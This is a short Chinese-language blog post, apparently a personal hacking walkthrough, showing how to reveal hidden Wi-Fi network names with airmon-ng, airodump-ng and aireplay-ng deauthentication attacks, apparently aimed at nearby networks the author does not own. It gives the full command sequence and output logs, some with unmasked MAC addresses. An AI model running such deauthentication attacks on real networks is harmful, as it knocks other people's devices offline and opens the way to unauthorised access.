theKingOfNight's Blog

隐藏wifi-ssid获取

字数统计: 876阅读时长: 4 min
2019/02/04 Share

隐藏wifi ssid获取

最近玩一些wifi的game,意识到隐藏wifi的速度可能会好一些,索性玩一玩

环境准备

1
2
3
4
┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng check kill
┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng start wlan0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[✗]─[root@parrot]─[~]
└──╼ #airodump-ng wlan0mon
CH 10 ][ Elapsed: 1 min ][ 2019-02-03 16:20
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -47 212 15 0 4 130 WPA2 CCMP PSK <length: 0>
30:FC:68:xx:xx:xx -1 0 1 0 5 -1 WPA <length: 0>
28:F3:66:xx:xx:xx -1 0 11 0 11 -1 WPA <length: 0>
48:7D:2E:xx:xx:xx -54 69 1 0 11 405 WPA2 CCMP PSK yangxiao
38:83:45:xx:xx:xx -55 108 284 0 11 65 WPA2 CCMP PSK <length: 0>
1C:AB:34:xx:xx:xx -55 85 365 6 11 130 WPA2 CCMP PSK H3C_6B7374
88:25:93:xx:xx:xx -56 60 0 0 6 405 WPA2 CCMP PSK <length: 0>
50:BD:5F:xx:xx:xx -58 51 0 0 1 405 WPA2 CCMP PSK <length: 0>
34:CE:00:xx:xx:xx -64 89 0 0 6 54e. OPN lumi-acpartner-v2_miap13b6
B0:95:8E:xx:xx:xx -65 49 30 0 6 405 WPA2 CCMP PSK yuhuole2
2C:CC:E6:xx:xx:xx -67 6 0 0 9 130 WPA2 CCMP PSK CU_tqev

像这些带有length:xx的就是隐藏wifi,名称我也不知道,不过没关系

可以查看下自己的网卡Mac(上次重装系统后好像变了,神奇)

1
2
3
4
5
6
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 80:fa:5b:xx:xx:xx txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

索性随便选取一条

1
2
3
4
5
CH 12 ][ Elapsed: 12 s ][ 2019-02-03 16:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK <length: 0>

实战

1
2
┌─[root@parrot]─[~]
└──╼ #airodump-ng -c 4 --bssid 68:DB:54:xx:xx:xx wlan0mon

会显示如下,下面出来BSSID才可以识别隐藏wifi的ssid

1
2
3
4
5
6
7
8
9
10
11
CH 4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
68:DB:54:xx:xx:xx 70:D9:23:xx:xx:xx -69 1e- 6 2 388
68:DB:54:xx:xx:xx 08:4A:CF:xx:xx:xx -87 0e- 1 0 106
68:DB:54:xx:xx:xx 38:6E:A2:xx:xx:xx -70 1e- 1e 0 10

然后

1
2
3
4
5
6
7
8
┌─[✗]─[root@parrot]─[~]
└──╼ #aireplay-ng -0 30 -a 38:83:45:xx:xx:xx -c 80:FA:5B:xx:xx:xx wlan0mon
16:49:11 Waiting for beacon frame (BSSID: 38:83:45:5E:E0:A2) on channel 11
16:49:12 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|59 ACKs]
16:49:12 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|55 ACKs]
16:49:13 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|50 ACKs]
16:49:13 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|57 ACKs]
。。。。。。

多尝试几次,然后对方的ssid就出来了,剩下就很简单了

1
2
3
4
5
6
7
8
9
10
11
12
CH 4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK 001
BSSID STATION PWR Rate Lost Frames Probe
68:DB:54:xx:xx:xx 70:D9:xx:xx:xx:xx -69 1e- 6 2 388
68:DB:54:xx:xx:xx 38:6E:xx:xx:xx:xx -84 0e- 6 0 4176
68:DB:54:xx:xx:xx 08:4A:xx:xx:xx:xx -87 0e- 1 0 106
68:DB:54:xx:xx:xx 38:6E:A2:xx:xx:xx -70 1e- 1e 0 10

坑点

airodump-ng和aireplay-ng需要同时打开,如果失败的话多aireplay-ng多执行几次
airodump-ng下边有ssid才可以,否则不行(可能是实验问题)

网络恢复

1
2
3
4
5
6
┌─[root@parrot]─[~]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[~]
└──╼ #service network-manager start
┌─[root@parrot]─[~]
└──╼ #reboot
CATALOG
  1. 1. 隐藏wifi ssid获取
  2. 2. 环境准备
  3. 3. 实战
  4. 4. 坑点
  5. 5. 网络恢复